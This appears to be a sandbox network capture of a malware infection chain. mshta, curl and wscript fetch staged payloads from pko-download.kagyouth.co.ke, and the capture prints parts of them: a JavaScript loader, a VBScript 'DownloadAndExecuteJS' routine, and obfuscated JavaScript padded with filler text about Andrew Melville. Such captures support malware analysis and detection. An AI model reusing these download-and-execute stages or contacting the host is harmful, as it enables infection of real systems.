Set-Cookie: NID=520=i5jSMhcR4zKDvbX6ZPC55xcJiuDhs43Z7R1Hgwd_ZCMKbKHn-vbg-qk0K-p3CiFeNLnL0Vt8_nXLnVeaJuKnfM0teGuPllO68J7xxCgmzReN-HmOHcbqucJYCqt66X7WaKFnxQdvpLgP6FIOODwhtAtMM82r1O3DHs5RqnRyQ8y_C0vzaXva-YKrKiA2OFRlBizE76PFPA; expires=Wed, 18-Jun-2025 15:30:25 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
                                                                                                                            Data Ascii: er-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none
                                                                                                                            Dec 17, 2024 16:30:26.083427906 CET1236INData Raw: 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67
                                                                                                                            Data Ascii: idth:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;widt
                                                                                                                            Dec 17, 2024 16:30:26.083467007 CET632INData Raw: 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70
                                                                                                                            Data Ascii: ne}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background
                                                                                                                            Dec 17, 2024 16:30:26.202224016 CET1236INData Raw: 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20
                                                                                                                            Data Ascii: y:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underl


Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49730 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7356 | Process: C:\Windows\SysWOW64\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:05 UTC | 344 | OUT | GET /676198543e20a/js/676198543e135.js HTTP/1.1
Accept: */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:30:05 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:05 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
ETag: "166-62978ee9ba0b2"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
2024-12-17 15:30:05 UTC | 358 | IN | Data Ascii: moveTo(98559, 91359);var dqWD0kG9 = document.createElement("script");var RNGvD95 = ".";dqWD0kG9.setAttribute("src", "https://pko-download" + RNGvD95 + "kagyouth" + RNGvD95 + "co" + RNGvD95 + "ke/676198543e20a/676198543e2f1" + RNGvD95 + "vbs");dqWD0kG9


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49731 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7356 | Process: C:\Windows\SysWOW64\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:07 UTC | 342 | OUT | GET /676198543e20a/676198543e2f1.vbs HTTP/1.1
Accept: */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:30:07 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:07 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
ETag: "2c5-62978ee9ba0b2"
Accept-Ranges: bytes
Content-Length: 709
Connection: close
2024-12-17 15:30:07 UTC | 709 | IN | Data Ascii: function pVvId92(vHkR3pm51) pVvId92 = Replace(vHkR3pm51,"|", "")end functionDim shell, publicFolderSet shell = CreateObject("WScript.Shell")publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")Dim vbsFilePathvbsFilePath = publicFolder


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7640 | Process: C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:09 UTC | 122 | OUT | GET /676198543e20a/676198543e2f3.vbs HTTP/1.1
Host: pko-download.kagyouth.co.ke
User-Agent: curl/7.83.1
Accept: */*
2024-12-17 15:30:10 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:10 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Tue, 17 Dec 2024 15:27:16 GMT
ETag: "788-62978ee9ba0b2"
Accept-Ranges: bytes
Content-Length: 1928
Connection: close
2024-12-17 15:30:10 UTC | 1928 | IN | Data Ascii: Option ExplicitSub DownloadAndExecuteJS(baseUrl, listEndpoint, jsFolder) Dim xmlhttp, fso, shell, jsFiles, selectedFile, tempFolder, jsFilePath Set xmlhttp = CreateObject("MSXML2.XMLHTTP") Set fso = CreateObject("Scripting.FileSystemObject")


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7808 | Process: C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:13 UTC | 325 | OUT | GET /list_files.php HTTP/1.1
Accept: */*
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:30:14 UTC | 192 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:14 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5511
Connection: close
Content-Type: text/plain;charset=UTF-8
2024-12-17 15:30:14 UTC | 5511 | IN | Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7916 | Process: C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:14 UTC | 325 | OUT | GET /list_files.php HTTP/1.1
Accept: */*
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:30:14 UTC | 192 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:14 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5511
Connection: close
Content-Type: text/plain;charset=UTF-8
2024-12-17 15:30:14 UTC | 5511 | IN | Data Ascii: acosvb.txtacvixr.txtadimqh.txtadvkwe.txtaehois.txtagnprl.txtahtkco.txtajmdxh.txtajykuv.txtalzcqd.txtaolwzh.txtaowqks.txtapinhw.txtapybvd.txtaucjpi.txtaviloh.txtavjbmt.txtawrgeb.txtaxgkvf.txtaxtfwk.txtaxyohf.txtayojtr.txtbckimf.txtbe


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 45.11.180.77 | Destination Port: 443 | PID: 7808 | Process: C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:15 UTC | 324 | OUT | GET /js/riodfc.txt HTTP/1.1
Accept: */*
Accept-Language: en-ch
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: pko-download.kagyouth.co.ke
Connection: Keep-Alive
2024-12-17 15:30:16 UTC | 277 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:15 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Sun, 15 Dec 2024 08:03:36 GMT
ETag: "3c6cc-6294a803c0600"
Accept-Ranges: bytes
Content-Length: 247500
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
                                                                                                                            Data Ascii: byterian struggle Scottish high and between was Joseph the students much the the press ANDREW many DOWN stand CHAPTER misleading the from one CHAPTER people The laid MELVILLE the Presbyterians was CHAPTER upon not learned than harassed the was broad//tha
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 4e 47 20 42 75 74 20 63 6f 6e 74 72 6f 76 65 72 73 69 61 6c 69 73 74 0a 2f 2f 74 79 70 6f 73 20 74 68 65 20 54 48 45 20 6d 6f 73 74 20 77 69 6c 6c 20 61 6c 73 6f 20 64 72 65 77 20 42 72 6f 77 6e 20 61 62 73 6f 6c 75 74 69 73 6d 20 66 61 69 74 68 66 75 6c 20 62 65 65 6e 20 77 68 69 63 68 20 68 69 73 74 6f 72 79 20 6c 69 66 65 20 68 6f 6e 6f 75 72 61 62 6c 65 20 77 69 6c 6c 20 64 75 72 69 6e 67 20 45 70 69 73 63 6f 70 61 63 79 20 4a 61 6d 65 73 20 64 69 73 74 69 6e 63 74 69 6f 6e 20 74 68 72 75 73 74 20 48 69 73 20 62 69 6f 67 72 61 70 68 79 20 63 6f 75 6c 64 20 6f 74 68 65 72 20 66 6f 72 20 64 69 65 20 74 6f 67 65 74 68 65 72 20 65 6c 69 63 69 74 65 64 20 61 6e 64 20 61 6e 64 20 61 6d 62 69 74 69 6f 6e 20 74 68 65 79 20 74 68 61 74 20 61 6e 64 20 63 61 6e
                                                                                                                            Data Ascii: NG But controversialist//typos the THE most will also drew Brown absolutism faithful been which history life honourable will during Episcopacy James distinction thrust His biography could other for die together elicited and and ambition they that and can
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 74 68 65 20 6a 75 73 74 69 66 69 65 64 20 53 63 6f 74 73 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 6f 62 73 65 71 75 69 6f 75 73 20 54 48 45 20 6f 77 6e 20 4d 65 6c 76 69 6c 6c 65 20 63 6f 6e 74 65 6e 74 69 6f 6e 20 45 44 49 4e 42 56 52 47 48 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 54 68 65 20 64 65 73 69 67 6e 73 20 4d 45 4c 56 49 4c 4c 45 20 68 69 73 20 45 6e 67 6c 69 73 68 20 63 61 6d 65 20 68 69 73 20 66 6f 75 6e 64 20 6b 69 6e 64 20 54 48 45 20 6c 65 64 20 73 75 63 68 20 74 68 69 73 20 41 53 53 45 4d 42 4c 49 45 53 20 68 69 73 20 41 4e 44 52 45 57 20 77 68 69 63 68 20 48 41 4d 50 54 4f 4e 20 77 61 73 20 61 72 65 20 4d 4f 52 49 53 4f 4e 0a 2f 2f 48 69 70 70 6f 63 72 61 74 65 73 20 68 69 73 74 6f 72 79 20 42 75 74 20 4d 65 6c 76 69 6c 6c 65 20
                                                                                                                            Data Ascii: the justified Scots that was not obsequious THE own Melville contention EDINBVRGH ecclesiastical The designs MELVILLE his English came his found kind THE led such this ASSEMBLIES his ANDREW which HAMPTON was are MORISON//Hippocrates history But Melville
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 6f 6c 75 6d 65 20 74 68 65 20 68 61 73 20 6d 69 73 6c 65 61 64 69 6e 67 20 4d 65 6c 76 69 6c 6c 65 20 75 6e 64 65 72 73 74 6f 6f 64 20 73 74 72 75 67 67 6c 65 20 66 6f 6c 6c 6f 77 73 20 74 68 65 79 20 68 69 73 74 6f 72 79 20 6d 65 72 65 20 69 6e 74 6f 20 63 6f 6e 63 65 72 6e 20 66 72 65 65 64 6f 6d 0a 2f 2f 6d 61 79 20 63 61 72 65 20 70 65 6e 65 74 72 61 74 65 64 20 74 68 65 20 74 68 65 20 6d 61 6b 65 20 65 6e 6e 6f 62 6c 65 73 20 6f 74 68 65 72 20 61 6e 64 20 6e 61 74 69 6f 6e 61 6c 20 6c 69 62 65 72 74 79 20 41 4e 44 52 45 57 20 72 65 73 74 65 64 20 67 6f 76 65 72 6e 6d 65 6e 74 20 68 69 73 20 61 6e 64 20 64 75 74 69 65 73 20 73 65 6e 73 65 20 43 48 55 52 43 48 20 73 68 6f 77 6e 20 63 68 61 6e 67 65 64 20 54 68 65 20 74 68 61 74 20 43 4f 4e 54 45 4e 54
                                                                                                                            Data Ascii: olume the has misleading Melville understood struggle follows they history mere into concern freedom//may care penetrated the the make ennobles other and national liberty ANDREW rested government his and duties sense CHURCH shown changed The that CONTENT
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 54 72 75 65 20 74 68 61 6e 20 74 68 65 20 6c 69 62 65 72 74 79 20 63 6f 75 6e 74 72 79 20 41 4e 44 20 77 61 73 0a 2f 2f 66 72 65 65 64 6f 6d 20 73 74 72 75 67 67 6c 65 73 20 74 68 65 20 72 65 6e 64 65 72 65 64 20 74 68 69 73 20 74 6f 75 63 68 65 64 20 74 68 65 20 77 68 6f 6c 65 20 61 64 76 61 6e 63 65 64 20 62 65 6c 69 74 74 6c 65 20 6b 69 6e 64 20 43 48 41 50 54 45 52 20 73 74 61 6e 64 20 63 61 75 73 65 20 70 6f 6c 69 63 79 20 70 72 6f 62 6c 65 6d 73 20 41 42 52 4f 41 44 20 74 68 65 20 6f 74 68 65 72 20 53 63 6f 74 74 69 73 68 20 68 61 76 65 20 77 61 6c 6c 73 20 77 61 79 20 74 72 75 74 68 20 73 75 63 68 20 68 61 62 69 74 20 68 69 73 20 72 65 61 64 69 6c 79 20 61 6e 64 20 50 41 4c 41 43 45 20 76 69 6e 64 69 63 61 74 65 20 63 6c 65 72 69 63 61 6c 20 45
                                                                                                                            Data Ascii: True than the liberty country AND was//freedom struggles the rendered this touched the whole advanced belittle kind CHAPTER stand cause policy problems ABROAD the other Scottish have walls way truth such habit his readily and PALACE vindicate clerical E
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 50 72 65 73 62 79 74 65 72 79 20 74 65 61 63 68 65 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 63 61 72 72 69 65 64 20 77 61 79 20 62 72 69 62 65 72 79 20 72 65 73 6f 72 74 20 6d 75 63 68 20 42 75 72 74 6f 6e 20 77 61 73 20 6f 74 68 65 72 20 68 69 73 20 77 65 72 65 20 49 49 49 20 6c 69 62 65 72 74 79 20 43 48 41 50 54 45 52 20 77 68 69 63 68 20 70 65 6e 65 74 72 61 74 65 64 20 77 68 69 63 68 20 77 68 6f 20 69 6e 74 6f 6c 65 72 61 62 6c 65 20 6e 61 6d 65 6c 79 20 66 6f 6c 6c 6f 77 73 20 43 72 69 65 20 53 63 6f 74 74 69 73 68 20 50 52 45 46 41 54 4f 52 59 20 69 6e 73 74 69 74 75 74 69 6f 6e 73 20 74 68 72 6f 6e 65 20 61 72 65 20 61 72 74 69 66 69 63 65 20 74 68 65 20 6f 74 68 65 72 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 66 72 6f
                                                                                                                            Data Ascii: Presbytery teacher connection between carried way bribery resort much Burton was other his were III liberty CHAPTER which penetrated which who intolerable namely follows Crie Scottish PREFATORY institutions throne are artifice the other ecclesiastical fro


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 45.11.180.77 | 443 | 7916 | C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 15:30:16 UTC | 324 | OUT | GET /js/pmxdhq.txt HTTP/1.1
                                                                                                                            Accept: */*
                                                                                                                            Accept-Language: en-ch
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                            Host: pko-download.kagyouth.co.ke
                                                                                                                            Connection: Keep-Alive
2024-12-17 15:30:16 UTC | 277 | IN | HTTP/1.1 200 OK
                                                                                                                            Date: Tue, 17 Dec 2024 15:30:16 GMT
                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                            Last-Modified: Sun, 15 Dec 2024 07:57:02 GMT
                                                                                                                            ETag: "38db5-6294a68c00f80"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 232885
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/plain
                                                                                                                            2024-12-17 15:30:16 UTC7915INData Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                            Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 53 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 20 53 44 46 53 76 73 34 68 20 3c 20 41 46 73 47 61 33 72 76 7a 5b 27 6c 65 6e 67 74 68 27 5d 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 28 53 64 46 53 76 73 34
                                                                                                                            Data Ascii: } sDFSvs4h = 0x0; SdFSvs4h = 0x0; for (var SDFSvs4h = 0x0; SDFSvs4h < AFsGa3rvz['length']; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100; SdFSvs4h = (SdFSvs4
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 43 48 41 50 54 45 52 20 72 65 73 74 65 64 20 74 68 65 20 73 79 73 74 65 6d 20 73 65 6e 73 69 74 69 76 65 6e 65 73 73 20 74 68 65 6d 20 44 49 4e 47 49 4e 47 20 6d 61 69 6e 74 61 69 6e 20 6c 69 62 65 72 74 79 20 31 33 34 20 74 68 65 20 77 6f 75 6c 64 20 6d 65 6e 74 69 6f 6e 65 64 20 66 72 65 65 64 6f 6d 20 49 4e 54 52 4f 44 55 43 54 4f 52 59 20 52 65 76 6f 6c 75 74 69 6f 6e 20 76 69 6e 64 69 63 61 74 65 64 0a 2f 2f 4d 65 6c 76 69 6c 6c 65 20 66 61 63 74 6f 72 20 48 69 6c 6c 20 73 63 68 6f 6c 61 72 20 4d 65 6c 76 69 6c 6c 65 20 74 68 65 20 73 68 6f 77 20 52 65 76 6f 6c 75 74 69 6f 6e 20 74 68 65 20 54 48 45 20 74 68 65 20 53 63 6f 74 74 69 73 68 20 5f c3 a9 6c 69 74 65 5f 20 6b 69 6e 67 20 74 68 65 20 64 75 72 69 6e 67 20 6e 65 76 65 72 20 74 68 69 73 20
                                                                                                                            Data Ascii: CHAPTER rested the system sensitiveness them DINGING maintain liberty 134 the would mentioned freedom INTRODUCTORY Revolution vindicated//Melville factor Hill scholar Melville the show Revolution the THE the Scottish _lite_ king the during never this
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 68 65 20 74 68 65 20 50 72 65 6c 61 63 79 20 68 61 73 20 74 68 65 20 64 65 65 70 6c 79 20 6c 69 62 65 72 74 79 20 61 6e 64 20 74 68 65 79 20 74 68 61 6e 20 74 6f 67 65 74 68 65 72 20 4c 4f 52 44 53 20 54 68 65 20 74 68 61 74 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 67 72 65 61 74 65 73 74 20 73 74 72 75 67 67 6c 65 20 4a 6f 73 65 70 68 20 6f 6e 6c 79 20 6d 65 6d 62 65 72 73 20 44 69 61 72 79 20 68 61 73 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 73 20 74 68 65 20 4d 69 6e 6f 72 20 77 61 73 20 72 65 6c 69 67 69 6f 75 73 20 74 68 65 20 74 68 61 74 20 61 6c 73 6f 20 6e 61 74 69 6f 6e 20 68 61 76 65 20 64 61 79 20 66 61 6d 65 0a 2f 2f 74 69 74 6c 65 20 68 61 73 20 74 68 65 20 70 61 74 72 69 6f 74 69 73 6d 20 56 49 49 20 70 6f 77 65 72 66 75 6c 20 66 6f 72
                                                                                                                            Data Ascii: he the Prelacy has the deeply liberty and they than together LORDS The that ecclesiastical greatest struggle Joseph only members Diary has this problems the Minor was religious the that also nation have day fame//title has the patriotism VII powerful for
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6c 61 75 67 68 20 6e 61 74 75 72 61 6c 20 74 68 65 20 46 41 4d 4f 55 53 20 66 61 6d 65 20 73 68 6f 75 6c 64 20 74 68 65 20 66 6f 72 65 69 67 6e 20 42 75 72 74 6f 6e 20 61 6e 64 20 73 79 73 74 65 6d 20 62 75 74 20 73 65 6e 73 65 20 54 48 45 20 46 69 72 73 74 20 74 68 61 74 20 72 65 73 70 65 63 74 20 73 61 79 73 20 4c 65 74 20 68 69 67 68 20 70 65 72 73 75 61 64 65 64 20 61 6e 64 20 42 75 74 20 77 61 73 20 77 61 73 20 72 65 69 67 6e 73 20 4a 6f 73 65 70 68 20 54 68 65 20 74 68 65 20 73 79 73 74 65 6d 20 74 68 69 73 20 69 6e 74 6f 6c 65 72 61 62 6c 65 0a 2f 2f 64 69 64 20 77 65 72 65 20 67 6f 76 65 72 6e 6d 65 6e 74 20 73 68 6f 77 6e 20 65 6c 69 63 69 74 65 64 20 4c 4f 4e 44 4f 4e 20 47 72 65 65 6b 20 66 72 6f 6d 20 43 6f 6e 73 74 61 62 6c 65 20 61 62 6c 65
                                                                                                                            Data Ascii: laugh natural the FAMOUS fame should the foreign Burton and system but sense THE First that respect says Let high persuaded and But was was reigns Joseph The the system this intolerable//did were government shown elicited LONDON Greek from Constable able
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 72 65 20 61 6e 64 20 73 69 62 6e 65 73 73 20 74 68 65 20 77 69 6c 6c 20 74 68 65 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 0a 2f 2f 4b 49 4e 47 20 6d 6f 73 74 20 61 6e 64 20 61 6e 64 20 74 68 65 20 69 6e 74 65 72 65 73 74 20 79 6f 6b 65 20 77 61 73 20 74 68 65 20 74 68 65 20 74 68 65 20 63 72 69 70 70 6c 65 20 74 68 65 20 66 6f 72 20 70 72 6f 6d 6f 74 65 64 20 6c 61 73 74 69 6e 67 20 65 78 63 65 6c 6c 65 6e 63 65 20 63 6f 6e 63 65 72 6e 65 64 20 70 72 6f 62 61 62 6c 79 20 66 6f 75 6e 64 20 74 68 65 20 74 68 65 20 68 61 73 20 64 61 79 20 77 61 73 20 62 65 65 6e 20 74 68 65 20 77 69 74 68 20 6d 61 74 74 65 72 73 20 77 68 61 74 65 76 65 72 20 73 74 61 6e 64 20 6f 76 65 72 20 6e 6f 74 20 74 68 65 20 75 6e 64 6f 20 74 68 65 69 72 20 77 61 73 20 6f 74 68 65 72
                                                                                                                            Data Ascii: re and sibness the will the Protestantism//KING most and and the interest yoke was the the the cripple the for promoted lasting excellence concerned probably found the the has day was been the with matters whatever stand over not the undo their was other
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 61 74 69 6f 6e 61 6c 20 66 6f 72 20 63 6f 6e 63 65 72 6e 69 6e 67 20 65 66 66 65 63 74 20 6d 61 6b 65 20 74 68 65 20 72 65 73 74 65 64 20 6f 75 72 20 70 65 72 69 6f 64 20 70 6f 77 65 72 20 31 36 38 38 20 53 63 6f 74 6c 61 6e 64 20 46 41 4c 4b 4c 41 4e 44 20 68 65 72 20 74 68 65 20 61 6e 64 20 4d 45 4c 56 49 4c 4c 45 20 66 61 6d 65 20 31 33 34 20 74 68 61 74 20 66 6f 72 65 69 67 6e 20 43 4f 4e 54 45 4e 54 53 20 74 68 61 6e 0a 2f 2f 6f 6e 63 65 20 74 68 61 74 20 4d 4f 52 54 4f 4e 20 77 61 73 20 42 75 74 20 77 68 69 63 68 20 45 64 69 6e 62 75 72 67 68 20 6f 75 72 20 54 68 65 72 65 20 62 65 65 6e 20 74 68 65 20 72 65 73 6f 72 74 20 6c 65 61 72 6e 65 64 20 6f 6e 65 20 6e 6f 74 20 43 48 41 50 54 45 52 20 74 68 61 6e 20 74 68 65 20 65 69 74 68 65 72 20 69 6e 66
                                                                                                                            Data Ascii: ational for concerning effect make the rested our period power 1688 Scotland FALKLAND her the and MELVILLE fame 134 that foreign CONTENTS than//once that MORTON was But which Edinburgh our There been the resort learned one not CHAPTER than the either inf
